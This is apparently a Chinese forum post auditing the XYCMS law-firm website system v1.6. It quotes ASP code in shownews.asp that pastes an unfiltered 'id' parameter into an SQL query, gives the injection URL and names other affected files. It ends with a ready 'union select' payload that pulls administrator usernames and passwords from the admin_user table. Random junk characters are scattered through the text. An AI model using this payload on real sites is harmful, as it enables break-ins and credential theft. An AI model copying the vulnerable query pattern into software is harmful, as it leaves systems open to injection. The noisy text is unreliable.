前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
0 @2 M% V3 {8 ? : K0 Q# R# n* e% {6 r7 L) A
淫荡分割线
7 E' k& X a' T! R- \' @1 W+ a--------------------------------------------------------
& n, N& R% l. R& U, g
/ h) S. S3 X1 X; w$ d9 B, L0 f审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
4 O# ^$ e" C# I源码地址:http://down.chinaz.com/soft/29233.htm* |3 L6 b4 }* X, q3 I
. k: r" Y& }$ P3 ^: V
漏洞文件:shownews.asp; r1 k$ @' f; S
漏洞代码:7-13行
% i' ^; a6 O- m6 |; h! w6 g 1 r1 T3 a$ S, }2 J/ N6 S
. ~9 l2 D' M" j! b9 O' k% w6 K/ |
<%
0 y( ]7 B1 C/ S9 Hid=request.QueryString("id")
. ~& N" Q& p" Q& _0 |6 L1 M 4 K7 W% P. K0 X+ W! M6 C" j
set snews=server.createobject("adodb.recordset")
: [/ p4 R$ x4 W- Gexec="select * from [news] where id="&id
9 w& {( U" M; Y w3 k0 Z1 O) F: K! ksnews.open exec,conn,1,1
, C0 H2 H$ V+ z7 Y$ K%>2 @4 h9 o/ ^6 X f8 s) ~+ i; S: U
6 b' x: J' s" b' Q0 H . M6 c9 B' o7 g! T( J, f+ \# I5 ]
什么过滤都没有 直造成注入- M' i% _/ x: t
% c* t9 \, h' J% g' ~+ r1 m- U注入点:http://127.0.0.1:99/shownews.asp?id=xx% o! W0 D: K1 I! H1 b3 L9 Y' {
+ _" Z5 G- j( F6 ]0 W- e
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找& W6 q8 p% T g
# |# m8 J3 R4 t) d. a1 l
3 V6 G8 v' u f5 A# k" F3 H
exp: union select 1,admin,password,4,5,7 from admin_user9 a9 K( B& g. i0 o( ?8 P
% R) W- y, E% Q4 s& d) {% _ |